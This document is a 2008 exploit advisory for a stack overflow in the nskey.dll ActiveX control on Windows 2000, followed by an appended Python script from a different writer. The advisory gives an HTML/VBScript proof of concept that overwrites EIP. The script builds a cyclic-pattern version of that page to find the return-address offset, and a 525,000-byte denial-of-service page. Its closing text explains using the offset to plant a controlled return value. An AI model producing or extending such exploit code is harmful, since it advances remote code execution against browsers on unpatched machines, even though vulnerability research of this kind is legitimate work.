
wms-overflow.txt

Posted on 22 August 2008

Product: Windows Media Services (nskey.dll)

Products affected/tested:
  Windows 2000 Server
  Windows 2000 Advanced Server
  Windows 2000 Datacenter Edition

Attack: Stack Overflow

Technical Details:

The nskey.dll ActiveX control is marked safe for scripting and safe for
initialization, so any web page can instantiate it and call its methods.
Passing at least 9752 bytes to CallHTMLHelp overwrites EIP, and remote code
execution may be possible.

PoC exploit:

  <html><body>
  <object id=target classid=clsid:2646205B-878C-11D1-B07C-0000C040BCDB></object>
  <script language=vbscript>
  arg1=String(9752, "A")
  target.CallHTMLHelp arg1
  </script>
  </body></html>

This PoC should work fine and overwrite EIP, hitting 0x41414141 of course.

Now for the part about why I released this information... Apparently this issue
has been very silently fixed (I cannot find ANY information ANYWHERE for or
relating to it) by Microsoft a few patches ago. And.. WINDOWS 2000 IS OLD.
Widely used, but still pretty old for a modern operating system. This bug was
pretty exploitable until I used Windows Up2date :( But, to no surprise, they
didn't fix the bug completely. There's still a DoS after putting about 525,000
bytes in the buffer. Oh well :)

Jeremy Brown (0xjbrown41@gmail.com)
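The PoC above fills the argument with "A"s, so the only thing the crash tells you is that EIP became 0x41414141; it does not say which 4 of the 9752 bytes landed on the saved return address. The usual next step is to replace the filler with a cyclic pattern whose every 4-byte window is unique and map the EIP value seen in the debugger back to an offset. The script below is an added example, not part of the advisory and not Microsoft's or the author's code. It reuses only the CLSID, the CallHTMLHelp method name and the two lengths (9752 and 525,000) from the advisory; the Metasploit-style pattern scheme, the chunked VBScript string construction (an assumption made to keep individual script lines short) and the output file names are my own choices.

```python
# Added example (not part of the original advisory): generate the CallHTMLHelp
# PoC with a cyclic pattern instead of "A"*9752 so the EIP value seen in the
# debugger can be mapped back to the exact byte offset of the return address.
import itertools
import struct

# CLSID, method name and the two lengths are taken from the advisory;
# everything else in this file is an assumption for illustration.
CLSID = "2646205B-878C-11D1-B07C-0000C040BCDB"
METHOD = "CallHTMLHelp"
CRASH_LEN = 9752      # length at which the advisory reports EIP being overwritten
DOS_LEN = 525000      # length at which the advisory reports the remaining DoS

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...). Every 4-byte window is
    unique for up to 26*26*10*3 = 20280 bytes, which comfortably covers CRASH_LEN."""
    if length > len(UPPER) * len(LOWER) * len(DIGIT) * 3:
        raise ValueError("pattern longer than 20280 bytes would repeat")
    chunks = []
    for a, b, c in itertools.product(UPPER, LOWER, DIGIT):  # digit varies fastest
        chunks.append(a + b + c)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length]


def pattern_offset(pattern, eip):
    """Map the EIP value read from the debugger (an int such as 0x41306141) back
    to the offset of the 4 pattern bytes that overwrote the saved return address.
    Returns -1 if EIP did not come from the pattern (0x41414141 from "A" filler)."""
    needle = struct.pack("<I", eip).decode("latin-1")  # x86 is little-endian
    return pattern.find(needle)


def build_poc(payload, chunk=1000):
    """Emit the HTML/VBScript trigger. The payload is assembled with one
    'arg1 = arg1 & "..."' statement per chunk instead of a single huge string
    literal (assumption: keeps every script line short and avoids any per-line
    limits in the VBScript engine)."""
    stmts = ['arg1 = ""']
    for i in range(0, len(payload), chunk):
        piece = payload[i:i + chunk].replace('"', '""')  # VBScript quote escaping
        stmts.append('arg1 = arg1 & "%s"' % piece)
    return (
        "<html><body>\n"
        "<object id=target classid=clsid:%s></object>\n"
        "<script language=vbscript>\n"
        "%s\n"
        "target.%s arg1\n"
        "</script>\n"
        "</body></html>\n"
    ) % (CLSID, "\n".join(stmts), METHOD)


if __name__ == "__main__":
    # Offset-finding variant: open wms-pattern.html in IE on a vulnerable
    # Windows 2000 box under a debugger, read EIP, then call pattern_offset().
    pattern = pattern_create(CRASH_LEN)
    with open("wms-pattern.html", "w") as f:
        f.write(build_poc(pattern))
    # DoS variant from the advisory's last paragraph: plain filler is enough,
    # since 525,000 bytes exceeds the unique span of the cyclic pattern anyway.
    with open("wms-dos.html", "w") as f:
        f.write(build_poc("A" * DOS_LEN))
    # Reading a crash back: EIP 0x41306141 is the bytes "Aa0A", i.e. offset 0.
    print("offset of 0x41306141:", pattern_offset(pattern, 0x41306141))
```

Run it to produce the two HTML files, load wms-pattern.html under a debugger on an affected host, and feed the observed EIP to pattern_offset(); the returned offset is where the return address sits inside the argument, which is the number you need to place a controlled value there instead of "A"s. A result of -1 means EIP holds something other than pattern bytes, so the crash is not the simple return-address overwrite the advisory describes.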

